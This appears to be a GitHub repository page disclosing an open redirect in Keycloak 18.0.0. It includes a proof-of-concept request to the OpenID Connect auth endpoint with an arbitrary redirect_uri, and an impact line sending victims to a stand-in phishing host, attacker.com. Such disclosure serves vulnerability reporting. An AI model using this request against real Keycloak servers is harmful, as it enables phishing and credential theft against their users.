OpenRedirect-Keycloak18.0.0

An open redirection vulnerability (open redirect) happens when attackers are able to control where a website or application redirects users. Here in this case, we can mention any URL as value of redirect_uri and it successfully redirects to it.

POC. /auth/realms/master/protocol/openid-connect/auth?client_id=&redirect_uri=<ANY_REDIRECT_URL>&state=72526a4b-d5b6-4424-90db-cc0f7c2001a7&response_mode=fragment&response_type=code&scope=openid&nonce=33e890be-c19f-463f-bd0e-7fdcd065c0fb HTTP/2

Impact. By exploiting the open redirect vulnerability on the keycloak using the URL parameter value 'redirect_uri', the attacker is redirecting the victim to http://attacker.com/phish

Name		Name	Last commit message	Last commit date
Latest commit History 11 Commits
Open-Redirect Vulnerability - keycloak.jpg		Open-Redirect Vulnerability - keycloak.jpg
README.md		README.md
Sample-Request		Sample-Request

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Open-Redirect Vulnerability - keycloak.jpg

Open-Redirect Vulnerability - keycloak.jpg

README.md

README.md

Sample-Request

Sample-Request

Repository files navigation

OpenRedirect-Keycloak18.0.0

About

Releases

Packages

syedsohaibkarim/OpenRedirect-Keycloak18.0.0

Folders and files

Latest commit

History

Repository files navigation

OpenRedirect-Keycloak18.0.0

About

Resources

Stars

Watchers

Forks